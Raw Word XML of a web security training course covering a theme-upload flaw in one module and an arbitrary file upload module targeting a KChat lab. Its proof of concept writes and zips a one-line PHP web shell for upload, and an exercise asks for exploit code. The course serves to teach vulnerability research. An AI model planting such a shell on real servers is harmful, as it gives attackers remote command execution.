    </w:p>
    <w:p w14:paraId="6CEACAF5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zi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ZipArchi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79074D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zip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op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s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/themes/temp.zip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C19D6D5" w14:textId="5C9F7978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zip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xtractT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s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/themes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 w:rsidR="00DE73F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36539C9F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zip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B52E485" w14:textId="22809869" w:rsidR="00767B65" w:rsidRDefault="00767B65" w:rsidP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unlin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s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/themes/temp.zip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159437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fol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s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themes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E3C9EA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rege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/[0-9.-]/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C5D7DE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fil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ndi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folde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DF752E4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ea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$files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$fil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33B63F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$file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.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$file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..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E331F4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g_m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rege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$fil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0037C7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_f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g_repl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rege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$fi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68BAD7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0066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pyDirecto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$folder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/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$fi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$folder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/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_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D4932A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r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folder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/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$fil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1E698D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toupp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b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HP_O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WIN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C4485F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mdi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scapeshellar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r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 /s /q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1951FB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6AF28F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sys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m -rf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scapeshellar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r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7E832C3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F04260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2F270D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FA172E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582A69" w14:textId="77777777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FF3C6FA" w14:textId="36439C2C" w:rsidR="00767B65" w:rsidRDefault="00767B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676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dir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/studio/theme'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)-&gt;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ucces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$messag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B23711" w14:textId="5118D2B9" w:rsidR="00767B65" w:rsidRDefault="00DE73F3" w:rsidP="00767B65">
      <w:r w:rsidRPr="00DE73F3">
        <w:lastRenderedPageBreak/>
        <w:t>It turns out you can upload your own theme! All you need is a zip file, and it will be happily extracted to `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>base_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>().'/themes'</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5496E" w14:textId="12D0AB7B" w:rsidR="00DE73F3" w:rsidRDefault="00DE73F3" w:rsidP="00767B65">
      <w:r>
        <w:t>Note: `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>base_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>` = Application root path. Which mean you will able to access the content of `themes` folder directly from the web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76873BD8" w14:textId="4EAA0101" w:rsidR="00DE73F3" w:rsidRDefault="00DE73F3" w:rsidP="00767B65">
      <w:r>
        <w:t>Here is a breakdown of the logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DEBCB" w14:textId="1E43D5AE" w:rsidR="00DE73F3" w:rsidRDefault="00DE73F3" w:rsidP="00DE73F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>: Validation is placed for parameter `</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">`, sometimes=optional, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimes:zip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = the mime type of </w:t>
      </w:r>
      <w:r w:rsidR="00760689">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>file must be zip (server side)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BDB10" w14:textId="40560BF3" w:rsidR="00DE73F3" w:rsidRDefault="00DE73F3" w:rsidP="00DE73F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>: variable declaration for `</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B8E7A4" w14:textId="25FE1DE6" w:rsidR="00DE73F3" w:rsidRDefault="00DE73F3" w:rsidP="00DE73F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>: The code check if file is uploaded via parameter `</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14F442" w14:textId="698F5740" w:rsidR="00DE73F3" w:rsidRDefault="00DE73F3" w:rsidP="00DE73F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The uploaded zip file is placed into </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>base_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>().'/themes'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:t>name `</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>temp.zip</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D71DDFE" w14:textId="18CBCC73" w:rsidR="00DE73F3" w:rsidRDefault="00DE73F3" w:rsidP="00DE73F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>: The content of zip file will extracted to `</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>base_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>().'/themes'</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6BB6D8" w14:textId="63104BEB" w:rsidR="00760689" w:rsidRDefault="00760689" w:rsidP="00760689">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc183609109"/>
      <w:r>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="6693673D" w14:textId="447E5BC4" w:rsidR="00760689" w:rsidRDefault="00760689" w:rsidP="00760689">
      <w:r w:rsidRPr="00760689">
        <w:t>We prepare a folder called `</w:t>
      </w:r>
      <w:r w:rsidRPr="00760689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>evil</w:t>
      </w:r>
      <w:r w:rsidRPr="00760689">
        <w:t>`, place our web shell inside it, zip the folder, and then upload it!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA1774" w14:textId="77777777" w:rsidR="00760689" w:rsidRDefault="0076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85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kdi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vil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF26D18" w14:textId="77777777" w:rsidR="00760689" w:rsidRDefault="0076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85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$ echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'&lt;?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h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ystem($_REQUEST["x"]); ?&gt;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evil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</w:p>
    <w:p w14:paraId="2E501526" w14:textId="77777777" w:rsidR="00760689" w:rsidRDefault="0076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185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$ zip evi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zip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 evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B4E43" w14:textId="77777777" w:rsidR="00137B9B" w:rsidRDefault="00137B9B" w:rsidP="00137B9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603C7D8C" w14:textId="70559A3F" w:rsidR="00760689" w:rsidRDefault="00137B9B" w:rsidP="00137B9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00137B9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EB65681" wp14:editId="5D53BBB9">
            <wp:extent cx="5731510" cy="1279525"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="15875"/>
            <wp:docPr id="87838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860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23733" w14:textId="663D083C" w:rsidR="00137B9B" w:rsidRDefault="00137B9B" w:rsidP="00137B9B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc183609110"/>
      <w:r>
        <w:t>Exercise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="4CB278CA" w14:textId="75D0BE7D" w:rsidR="00137B9B" w:rsidRDefault="00137B9B" w:rsidP="00137B9B">
      <w:r>
        <w:t>Your task is to build proof of concept code to exploit this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E9D1A" w14:textId="7C4430D0" w:rsidR="00671166" w:rsidRDefault="00137B9B" w:rsidP="00137B9B">
      <w:r w:rsidRPr="00137B9B">
        <w:t>Extra: What other vulnerabilities might be present in the application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1184C3" w14:textId="77777777" w:rsidR="00671166" w:rsidRDefault="00671166">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55B66D" w14:textId="519C483E" w:rsidR="00137B9B" w:rsidRDefault="00671166" w:rsidP="00671166">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc183609111"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Module 3 – Arbitrary File Upload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="4126FEB5" w14:textId="77777777" w:rsidR="00CD0E0B" w:rsidRDefault="00CD0E0B" w:rsidP="00CD0E0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc183609112"/>
      <w:r>
        <w:t>Getting Started</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="5D287B4A" w14:textId="515F3C59" w:rsidR="00CD0E0B" w:rsidRDefault="00CD0E0B" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:t>For this module, the working directory is located at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$HOME/classroom/module-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>`. Start by navigating to this directory in your terminal. Once you're there, run the command `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>./bin/start.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t xml:space="preserve">` to launch the module server. After everything is set up, </w:t>
      </w:r>
      <w:r>
        <w:t>you need to run following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D5E68" w14:textId="77777777" w:rsidR="00CD0E0B" w:rsidRDefault="00CD0E0B" w:rsidP="00601C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231737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ocker compose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f dock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mpo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a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ec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ap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rtisan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gr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fresh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1006376E" w14:textId="09457626" w:rsidR="00CD0E0B" w:rsidRDefault="00CD0E0B" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After that </w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>the target web application will be accessible at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888/</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E26C9" w14:textId="2EF56372" w:rsidR="00FF11F0" w:rsidRDefault="00FF11F0" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The application we are targeting is called `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF11F0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>KChat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">`, at the time of writing the current version is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>2.0.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007D13FC">
        <w:t>So, any vulnerabilities you find will be considered zero-day</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B660678" w14:textId="65A56C29" w:rsidR="00FF11F0" w:rsidRDefault="00FF11F0" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vendor URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:t>https://github.com/php-kchat/kchat/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57718E2C" w14:textId="5E8498A7" w:rsidR="00FF11F0" w:rsidRDefault="00FF11F0" w:rsidP="00601C79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc183609113"/>
      <w:r>
        <w:t xml:space="preserve">Investigating </w:t>
      </w:r>
      <w:r w:rsidR="00BF52BC">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00BF52BC">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>pplication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="6C42B073" w14:textId="6A8229B7" w:rsidR="00671166" w:rsidRDefault="00FF11F0" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF11F0">
        <w:t>At first, if you browse the application at `</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:t>`, you</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF11F0">
        <w:t>ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF11F0">
        <w:t xml:space="preserve"> see the debug bar at the footer of the app. You can turn it off by changing `</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>APP_DEBUG=true</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:t>` to `</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>APP_DEBUG=false</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:t>` in the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF11F0">
        <w:t>` file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E449D" w14:textId="096B2326" w:rsidR="00FF11F0" w:rsidRDefault="00FF11F0" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>You need to register an account to continue</w:t>
      </w:r>
      <w:r w:rsidR="00197091">
        <w:t xml:space="preserve"> exploring the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486612D" w14:textId="1E69ABDE" w:rsidR="00197091" w:rsidRDefault="00197091" w:rsidP="00601C79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc183609114"/>
      <w:r>
        <w:t xml:space="preserve">Investigating </w:t>
      </w:r>
      <w:r w:rsidR="00BF52BC">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>he Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="4A546F8F" w14:textId="6D1C2462" w:rsidR="00BF52BC" w:rsidRDefault="00601C79" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00601C79">
        <w:t>Since this codebase is a bit larger than our previous application, we can now try a source-to-sink approach for code review to identify potential vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In sublime text you can find in folder to make is easier to find code snippet (compared to grep). Right click `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00601C79">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` folder and click `</w:t>
      </w:r>
      <w:r w:rsidRPr="00601C79">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>find in folder</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E9611" w14:textId="31FA351B" w:rsidR="00601C79" w:rsidRDefault="00601C79" w:rsidP="00601C79">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00601C79">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D428D2" wp14:editId="18FAC2E0">
            <wp:extent cx="4572638" cy="3400900"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="28575"/>
            <wp:docPr id="796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1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0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A9ED0" w14:textId="77777777" w:rsidR="005B00CC" w:rsidRDefault="005B00CC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5A260195" w14:textId="4BF94AE2" w:rsidR="00601C79" w:rsidRDefault="005B00CC" w:rsidP="005B00CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc183609115"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sink to Source</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="420B70F5" w14:textId="783B152D" w:rsidR="005B00CC" w:rsidRPr="005B00CC" w:rsidRDefault="005B00CC" w:rsidP="005B00CC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005B00CC">
        <w:t>This approach helps cut down the amount of code we need to review, focusing only on interesting functionalities. Since we know that file handling involves the code `</w:t>
      </w:r>
      <w:r w:rsidRPr="005B00CC">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$request-&gt;file</w:t>
      </w:r>
      <w:r w:rsidRPr="005B00CC">
        <w:t>`, we might want to start by looking for instances of that first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A2BEC" w14:textId="7C7C4933" w:rsidR="00601C79" w:rsidRDefault="005B00CC" w:rsidP="005B00CC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005B00CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47111AE5" wp14:editId="2C7E85FF">
            <wp:extent cx="5687219" cy="2867425"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="28575"/>
            <wp:docPr id="160141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132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86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80306" w14:textId="62F9BD26" w:rsidR="005B00CC" w:rsidRDefault="00EB474B" w:rsidP="00EB474B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MessageController.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C0B4523" w14:textId="095AFEBD" w:rsidR="00EB474B" w:rsidRDefault="00EB474B" w:rsidP="00EB474B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We start by investigate this file</w:t>
      </w:r>
      <w:r w:rsidR="00EE0689">
        <w:t xml:space="preserve"> located at `</w:t>
      </w:r>
      <w:r w:rsidR="00EE0689" w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>app/Http/Controllers/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE0689" w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>MessageController.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE0689">
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E245FB" w14:textId="3119977B" w:rsidR="00601C79" w:rsidRDefault="00EB474B" w:rsidP="00EB474B">
      <w:r w:rsidRPr="00EB474B">
        <w:t>Now we need to trace back and figure out which route is connected to this function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE71842" w14:textId="77777777" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:r>
        <w:t>We found this in `web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>routes.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">`:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A74E8B" w14:textId="77777777" w:rsidR="00EE0689" w:rsidRDefault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381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Rou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group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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'middleware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heckLogi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E7D1D97" w14:textId="77777777" w:rsidR="00EE0689" w:rsidRDefault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381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nip  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4DD54" w14:textId="77777777" w:rsidR="00EE0689" w:rsidRDefault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381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Rou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po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/messages/updat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essageControl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pdateConvers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)-&gt;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Update Conversation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70BD78E" w14:textId="77777777" w:rsidR="00EE0689" w:rsidRDefault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381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35059A40" w14:textId="258C0EEA" w:rsidR="00EB474B" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:r>
        <w:t>It seems like this route is related to sending or editing messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14763E8D" w14:textId="428B4121" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserController.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23A7ECB7" w14:textId="684C927C" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:r>
        <w:t>Located at `</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:t xml:space="preserve"> app/Http/Controllers/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:t>Controller.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6DEDBB" w14:textId="0D27EB38" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:r>
        <w:t xml:space="preserve">Retrace the route </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E1032" w14:textId="77777777" w:rsidR="00EE0689" w:rsidRDefault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62893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Rou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po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/profil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UserControl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aveProfil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)-&gt;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Save Profile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45A35E8" w14:textId="77777777" w:rsidR="003978E9" w:rsidRDefault="003978E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451BA249" w14:textId="5A79F934" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc183609116"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
